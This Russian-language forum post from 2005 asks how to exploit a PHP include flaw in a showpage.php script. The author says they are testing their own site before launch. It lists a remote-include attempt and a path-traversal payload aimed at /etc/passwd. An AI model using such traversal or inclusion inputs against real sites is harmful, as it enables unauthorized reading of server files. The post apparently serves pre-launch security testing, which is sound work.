Marmota Bobak
Зарегистрирован: 28.07.2004
Сообщения: 68
|
 Добавлено: Сб Окт 08 2005 16:46 Заголовок сообщения: php-include - дырки в сайте |
 |
|
нужно протестить сайт на баги перед тем, как выложить в сеть. Вот, нашел дырку - php-include баг.
короче, контент иклудится в шаблон таким образом :
www.сайт.ru/showpage.php?name=content.php
Потом файл content/content.php вставляется (то есть к названию файла, которое берется из переменной name приписывается content/). Дырка, вроде, явная, но практическое использование так и не нашел.
1. Пробовал ?name=http://www.другой_сайт.ru/1.php - получается ошибка. Естественно, скрипт не может инклудить content/http://www.другой_сайт.ru/1.php.
2. Пробовал всякие комбинации типа ?name=../../etc/passwd. В принципе, если такой файл есть, то он находится. Но такого файла нет!
Короче, нужно как-нить поюзать этот баг.
ЗЫ Мне не нужно исправлять этот баг. У меня другая задача : доказать, что это действительно баг и его могут поюзать |
|
FAQ 
Поиск 
Пользователи 
Группы
Регистрация
Профиль 
Войти и проверить личные сообщения 
Вход 
